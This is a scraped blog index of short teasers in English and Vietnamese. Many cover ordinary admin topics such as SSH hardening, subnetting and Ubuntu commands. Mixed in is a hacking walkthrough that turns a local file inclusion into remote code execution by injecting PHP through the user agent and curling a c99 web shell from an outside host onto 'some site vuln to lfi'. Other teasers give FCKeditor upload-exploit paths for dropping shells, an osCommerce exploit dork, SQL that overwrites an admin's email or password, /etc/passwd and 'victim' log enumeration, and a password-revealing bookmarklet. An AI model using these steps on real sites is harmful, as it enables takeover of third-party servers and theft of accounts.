OpenSSH is the implementation of the SSH protocol. OpenSSH is recommended for remote login, making backups, remote file transfer via scp or sftp, and much more. SSH is perfect to keep confidentiality and integrity for data exchanged between two networks and systems. However, the main advantage is server authentication, through the use of public key cryptography. From time to time there are rumors about OpenSSH zero dayexploit. Here are a few things you need to tweak in order to improve OpenSSH server security.

Default Config Files and SSH Port

• /etc/ssh/sshd_config - OpenSSH server configuration file.


• /etc/ssh/ssh_config - OpenSSH client configuration file.


• ~/.ssh/ - Users ssh configuration directory.


• ~/.ssh/authorized_keys or ~/.ssh/authorized_keys - Lists the public keys (RSA or DSA) that can be used to log into the user’s account


• /etc/nologin - If this file exists, sshd refuses to let anyone except root log in.


• /etc/hosts.allow and /etc/hosts.deny : Access controls lists that should be enforced by tcp-wrappers are defined here.


• SSH default port : TCP 22

Read More

How to create a Multiboot USB Flash Drive that you can use to Boot Multiple ISO Files from USB. Please note that you might need a 8GB-16GB or larger USB flash device to be able to support every bootable ISO entry. I will update and add more Bootable ISO files to the list as I find the time to test them. You can also contact me to submit working Bootable Linux ISO menu.lst entries for inclusion.

Read More

Custom Multiboot UFD containing your favorite Bootable Live Linux Distributions.

 

Official HomePage: http://liveusb.info/dotclear

Multisystem Prerequisites:

• Ubuntu Linux or Ubuntu Based System (can use an Ubuntu CD or USB)


• A USB Flash Drive (to use for your MultiBoot USB)


• Working Internet Connection


• install-depot-multiboot.sh.tar.bz2

Read More

Dạo trước mình có viết bài Subnet mask và cách chia có trình bày về cách chia Subnet căn bản. Cách tính và nhớ phương phá để chia Subnet có nhiều cách, bài này trình bày cách tính rất nhanh, tham khảo nhé. VIA từ blog của Anh Lê Cường.




Các bước chia như sau:

Ta có bài LAB như sau:

Ví dụ ta có IP 192.168.1.0 chia 3 mạng con theo yêu cầu của sếp:

B1: Xác định số bit sẽ mượn dựa vào số mạng con muốn chia (quy tắc bàn tay trái):

Công thức tính để chia bao nhiêu mạng con ta làm như sau:

2^n >= m (m là số mạng con cần chia hay còn gọi là số subnet cần chia, n là con số bit ta sẽ mượn)

suy ra ta có: 2^n >=3 (số 3 là số mạng con mà sếp yêu cầu).

suy ra tiếp n là số 2. (Nhìn bàn tay trái đốt thứ 2 của ngón út là số 4, 4 dĩ nhiên lớn hơn 3).

B2: Quy tắc bàn tay phải: Ở đây ta sẽ mượn 2 bit (số n ở trên B1). Dựa theo hình tay phải nó sẽ là số 192.

B3: Tìm bước nhảy (Bước nhảy có nghĩa là 3 mạng con này sẽ nằm từ ip bao nhiêu tới bao nhiêu cho mỗi bước).

Lấy 256 - 192 của B2 (ở đâu có 256? xin thưa 0--> 255 là có 256 host vì vậy ta lấy 256 -192 = 64

==> Ta có các mạng con như sau:

Mạng 1: 192.168.1.0          Netmask: 255.255.255.192

Mạng 2: 192.168.1.64          Netmask: 255.255.255.192

Mạng 3: 192.168.1.128          Netmask: 255.255.255.192

Mạng 4: 192.168.1.192          Netmask: 255.255.255.192

Xong rồi, được 4 lớp mạng nhỏ, tuỳ bạn sử dụng nhé. Test cái bằng cách cài đặt win xp cho 2 cái máy ảo sau đó đặt IP theo 3 trường hợp sau:

TH1:

Máy 1:

192.168.1.70         Netmask: 255.255.255.192

Máy 2:

192.168.1.80         Netmask: 255.255.255.192

Kết quả: Cho 2 máy ping nhau ==> kết quả ping OK. (Reply from 192.168.1.80: bytes=32 time=1ms TTL=128)

TH2:

Máy 1:

192.168.1.70 Netmask: 255.255.255.192

Máy 2:

192.168.1.180 Netmask: 255.255.255.192

Kết quả: Cho 2 máy ping nhau ==> kết quả ping Không được (vì 2 ip này khác mạng).

TH3:

Máy 1:

192.168.1.62 Netmask: 255.255.255.192

Máy 2:

192.168.1.128 Netmask: 255.255.255.192

Kết quả: Máy 1 không đặt được IP và Máy 2 cũng vậy.

Tại sao vậy? cho bạn kết luận nhé.

Kết thúc bài LAB. Sau bài LAB này bạn có công thức tính và chia subnet. Sau đó tiếp tục bạn hãy thử học phương pháp tính nhanh phía dưới nhé.

Read More

Subnet là gì?: Hiểu đơn giản vầy. Khi ta chia một Network ra thành nhiều Network nhỏ hơn thì các Network nhỏ này được gọi là Subnet.


Vì sao cần phải chia Subnet mask?

Read More

================================
Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================

So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you sucessfully found logs 

Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?

Open a new tab in Mozilla,and type "about :config" (without quotes)...

Now,in "Filter" type: general.useragent.extra.firefox

You will get something like this:

Code:

Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7

Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with

Code:

<? include("http://shelladdress.com/c99.txt"); ?>

If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...

Instead of typing

Code:

<? include("http://shelladdress.com/c99.txt"); ?>

as useragent,type this:

Code:

<? passthru($_GET['cmd']); ?>

Then load your vuln page like this:

Code:

http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ%00?cmd=curl http://shelladress.com/c99.txt -o c99.php

So,lets review... basicaly,you are just adding &cmd= thing at the end of url...

Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...

Now simply go to your site like this:

Code:

http://yourvulnsite.com/c99.php

And that's all...

Enjoy,if I helped you,hit the thanks button...]

 

Read More

Code:

<?php
@chmod("index.php", 0755);
?>

Code này chỉ hoạt động tại nơi up load lên
Ví dụ :
Em muốn chmod file index.php tại thư mục ( diễn đàn )
thì mấy anh cứ up code đó tại thư mục diễn đàn rồi rồi run file php đó

 

Read More

# Exploit Title: [oscommerce remote upload from categories.php]
# Google Dork: ["powered by oscommerce"]
# Date: [20-November-2010]
# Author: [Number 7]
#Contact: {an[dot]7[at]live[dot]fr}
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Tested on: [windows-linux-FreeBSD-Solaris]

Read More

If you have used Mandrake (or most any Linux distribution) for any time you've become familiar with the great utility Linuxconf. Linuxconf is installed by default on a Mandrake system and can be used for a score of configuration related tasks. Check out the Linuxconf homepage for more details.You can usually find linuxconf in the /bin directory of your machine. If you don't have it, feel free to download the latest RPM from RPMfind.net or any one of the mirrors found at Mandrake Linux.

Read More

A little while ago I did an article on breaking into Windows shares using an automated madirish.bat. If you're not familiar with that article, feel free to read up on Madirish.net (articles Madirish Tutorial 09 and Tutorial 10 in the 'Tech' section). In that article I showed how to use native windows diagnostic commands to browse around not only your local network, but also remote networks, to find open shares and access the resources in those shares. In this short piece I'll show you how to do the same thing from a Linux environment. The lynchpin to this operation is Samba, the Linux tool that allows Linux machines to play in Windows networks. If you don't have Samba installed, your going to need it (the client tools only, the server isn't necessary). If you don't know how to install Samba head over to www.Samba.org. If you still can't figure out how to install samba on your own computer you really don't have any business breaking into other people's computers :)

Read More

Connecting Securely

Often times utilizing remote MySQL databases is as simply as opening a SSH session to the remote machine and typing 'mysql -u username -p' and using the MySQL command line client. Sometimes, however, this can be cumbersome and you might wish to use a GUI based management tool. This becomes a problem however if the remote database is behind a firewall that won't allow remote MySQL port connections (MySQL accepts connections on port 3306 by default) or if you're worried about your password being transmitted in clear text. This short article describes how to connect to a remote MySQL server securely. By default, MySQL clients issue passwords in clear text to the server (meaning if they are intercepted they aren't secured at all). In order to connect to a remote server you can use port forwarding. Using this method you can also bypass firewalls that allow remote SSH connections (i.e. open port 22), but block remote MySQL connection (i.e. closed or blocked port 3306).

Read More

The proliferation of wireless networks is sometimes scary when you consider how insecure most wireless configurations are. With a little work, and some technical know-how you can easily break into most wireless networks or simply monitor the wireless traffic flowing all around you. The good news is that setting up a wireless monitor takes a bit of persistence and isn't very feasible for the average computer user.

The easiest way to begin monitoring wireless network traffic is with kismet. Kismet is most easily installed on Linux, but be warned, it isn't all that easy. To begin you need to download Kismet from http://www.kismetwireless.net. You'll need to be sure you have gcc and make installed in order to compile the sources. On Mandriva you can install these using:

Read More

SSHatter is an SSH brute force utility available from http://freshmeat.net/projects/sshatter/?branch_id=70781&release_id=263196. Essentially the tool is comprised of a small Perl file. The utility requires a few non-standard Perl libraries but these are easily installed. You must have Perl installed to use SSHatter.

Installing SSHatter

Read More

Netcat is an oft maligned program that can easily be used for many interesting and useful purposes. While many admins have heard of netcat, it is usually in the context of detecting rootkits or evidence of intrusion. The fact that netcat is a favorite tool among malicious hackers does a great disservice to the tool, but it also demonstrates its utility.

Read More

Arbitrary Code Execution Vulnerabilities

Note: If you haven't read Lesson 1 go check it out first for test application install instructions.

This type of vulnerability is extremely dangerous. Unsafely written PHP that utilizes system calls and user input could allow an attacker to run an arbitrary command on the filesystem. This attack bears many resemblances to SQL injection in that the attacker manipulates input to cause execution of unintended commands. This vulnerability shows up in many forms, so utmost care should be used whenever using one of PHP's many filesystem call functions (such as system(), exec(), passthru(), shell_exec(), etc.)

Read More

PHP File Upload Exploits

Note: If you haven't read Lesson 1 go check it out first for test application install instructions.

File upload exploits are a common problem with web based applications. In a nutshell this vulnerability hinges on functionality that allows an attacker to upload a script file that can then be executed on the server. The most common cause of this vulnerability is functionality that is supposed to allow users to upload inert content (things like images, PDF documents and the like) that is designed to be displayed. Often, however, developers forget to accomplish proper input validation (are you noticing a theme here yet?) that doesn't restrict the types of files an attacker can upload.

Read More

PHP File Include Vulnerabilities

Note: If you haven't read Lesson 1 go check it out first for test application install instructions.

Along the same lines of SQL injection and XSS, remote file inclusion vulnerabilities rely on the user being able to manipulate variables interpreted by PHP. The most common occurance of this vulnerability is the utilization of URL strings to determine included files. This threat of this vulnerability is largely determined by the configuration of the PHP server. Some servers will allow more malicious includes than others.

Read More

Brute Forcing

Note: If you haven't read Lesson 1 go check it out first for test application install instructions.

Brute forcing a web application is a method to bypass traditional authentication checks. Although brute forcing may seem like an attack that a PHP developer might not be able to mitigate, it is actually an important consideration when developing web applications.

Read More

SQL Injection

Note: If you haven't read Lesson 1 go check it out first for test application install instructions.

SQL injection attacks bear many of the same fundamental hallmarks as XSS attacks. At its core and SQL injection abuses the web application to introduce unintended functionality. SQL injection aims to escape out of the confines of a developer crafted SQL statement to alter the SQL. Take the following example:

Read More

This exercise is designed to expose you to several of the top threat vectors facing web based applications, specifically PHP/MySQL applications. 'Threat vector' is a common term used in computer security to connote ways in which an attacker will attempt to compromise a system. System is used in a broad sense here because a compromised web application can easily lead to a compromised web server which in term could lead to a compromised operating system.

Read More

Web Application Passwords

Many PHP based web applications use md5 hashing in order to obscure stored passwords. At first glance this seems like an effective security measure, however upon further examination it becomes clear that this approach does little to secure a password. Let us assume that an attacker somehow captures the md5 hash of a users password. This could happen in many ways, the most obvious being a SQL injection that reveals the password.

MD5

Read More

One standard form of information discovery and reconnaissance used by malicious attackers is to scan a target website and search for robots.txt files. The robots.txt file is designed to provide instructions to spiders or web crawlers about a site's structure and more importantly to specify which pages and directories the spider should not crawl. Often these files are used to keep a spider from crawling sensitive areas of a website, such as administrative interfaces, so that search engines don't cache the existence of such pages and functionality. It is precisely for this reason that a malicious attacker will look in a robots.txt file - they often provide roadmaps to sensitive data and administrative interfaces.

Read More

One standard form of information discovery and reconnaissance used by malicious attackers is to scan a target website and search for robots.txt files. The robots.txt file is designed to provide instructions to spiders or web crawlers about a site's structure and more importantly to specify which pages and directories the spider should not crawl. Often these files are used to keep a spider from crawling sensitive areas of a website, such as administrative interfaces, so that search engines don't cache the existence of such pages and functionality. It is precisely for this reason that a malicious attacker will look in a robots.txt file - they often provide roadmaps to sensitive data and administrative interfaces.

Read More

The pathinfo() built-in PHP function is often used by programmers to identify the types of files being specified in URLs. Pathinfo will do simple parsing of path and filenames and present an array of useful attributes such as the base name of the file specified or the file extension of the file specified. The following example is provided from the PHP.net website:

<?php
$path_parts = pathinfo('/www/htdocs/index.html');

echo $path_parts['dirname'], "\n";
echo $path_parts['basename'], "\n";
echo $path_parts['extension'], "\n";
echo $path_parts['filename'], "\n"; // since PHP 5.2.0
?>

Read More

PHP's default configuration file, php.ini (usually found in /etc/php.ini on most Linux systems) contains a host of functionality that can be used to help secure your web applications. Unfortunately many PHP users and administrators are unfamiliar with the various options that are available with php.ini and leave the file in it's stock configuration. By utilizing a few of the security related options in the configuration file you can greatly strengthen the security posture of web applications running on your server.

Safe Mode

Read More

===[ Exploit ]===

[»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp

[»] asp renamed via the .asp;.jpg (shell.asp;.jpg)

Read More

===[ Exploit ]=== ./Iranian HackerZ

[»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html

[»] Select the "File Upload" To use = php

===[ Upload To ]===

[»] http://server/[patch]/userfiles/Name File

Read More

exploit # path/html/FCKeditor/editor/filemanager/connectors/uploadtest.html

[!] first find the target host

ex: www.site.com or www.target.com/maximus

then # http://site.com/FCKeditor/editor/filemanager/connectors/uploadtest.html#

Read More

1) Giới thiệu

Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Bạn có thể download chương trình tại www.metasploit.com

Metasploit có thể tự động update bắt đầu từ version 2.2 trở đi, sử dụng script msfupdate.bat trong thư mục cài đặt

2)Các thành phần của Metasploit

Read More

Add vô bookmark bar của Firefox trong Location để code sau:

javascript : var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Xem mật khẩu', s)}else{alert('Mật khẩu trống')}return true;}}

Auto check Rule register VBB:

javascript:var%20x=document.getElementById('cb_rules_agree');x.checked='on';var%20y=document.getElementsByTagName('input');for%20(var%20i=0;i<y.length;i++){if%20(y[i].value=='Register'){y[i].click();}};

Auto Birthday VBB register:

javascript:var%20x=document.getElementsByTagName('select');x[0].value='01';x%20%20[1].value='01';var%20y=document.getElementsByTagName('input');for%20(var%20i=0;i<y.length;i++){if%20(y[i].name=='year'){y[i].value=1980;}};

Read More

update user set email="hehehe@yahoo.com" where id=1

update 'user' set 'email'='mail_cua_minh@yahoo.com' where 'username'='user_admin';

update 'table_can_update' set 'ten_pas_can_update'='pas_moi_de_update' where 'ID'='ID_admin';

update user set passwd ="e10adc3949ba59abbe56e057f20f883e" where id=1

Read More

cat /etc/passwd | cut -f1 -d:

hay:

cut -f1 -d: /etc/passwd

Thêm 1 cách tìm path victim

Bạn đã bao giờ gặp phải 1 site mà nó addon domain


xem etc/passwd dek thay

nghía qua cái error_log thì 2-3Gb gì đấy đơ cả máy 

share với các bạn 1 thủ thuật nhỏ 

find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'

Read More

Những thao tác và thủ thuật dưới đây có thể sẽ hữu ích cho bạn khi sử dụng Ubuntu cả 2 phiên bản Desktop và Server.
sudo: khi sudo được đi kèm trước một dòng lệnh nó sẽ gọi quyền root để thực thi câu lệnh đó, và khi thực thi xong nó sẽ trả lại quyền của user bạn đang dùng.
sudo apt-get install package_name: apt-get install sẽ tiến hành cài đặt gói phần mềm và bạn muốn cài đặt phần mềm gì thì thay package_name bằng tên của gói phần mềm cần cài đặt. Và bạn gọi sudo ở trước câu lệnh để yêu cầu quyền cài đặt của người dùng cao nhất ở đây là root hoặc xác nhận từ chính bạn nếu tên người dùng của bạn thuộc nhóm người dùng root.
VD: sudo apt-get install rar

Read More

-0: Hình như giống với mstsc /console

-D: No title bar

-g: set độ phân giải

-z: nén (sẽ chạy nhanh hơn)

-r <path>: tự map folder máy thật sang thành ổ mạng.

 

Read More

Shortcut bàn phím

Trong Ubuntu và Linux Mint, mặc đình phím tắt của terminal là kết hợp giữa Ctrl+Alt+T. Nếu bạn muốn thay đổi phím tắt này để có thể mở terminal theo cách riêng, vào Menu > System> Preferences > Keyboard Shortcuts.

Kéo cửa sổ xuống và tìm shortcut for “Run a Terminal”. Nếu bạn muốn thay đổi cài đặt, kích vào Run a terminal rồi đặt phím tắt mới theo ý muốn.

Phải chuột menu

Read More

Gỡ bỏ VirtualBox cũ trong máy
Tùy thuộc vào phiên bản bạn sử dụng, ví dụ với phiên bản 3.2

sudo apt-get remove virtualbox-3.2

Thêm kho của VirtualBox và cài đặt:

Chạy các lệnh sau để thêm và cài đặt

Read More

Di chuyển / liệt kê các tập tin

pwd hiển lên tên thư mục đang làm việc với

cd di chuyển sang thư mục « /home/người_dùng »

cd ~/Desktop di chuyển sang thư mục

« /home/người_dùng/Desktop »

Read More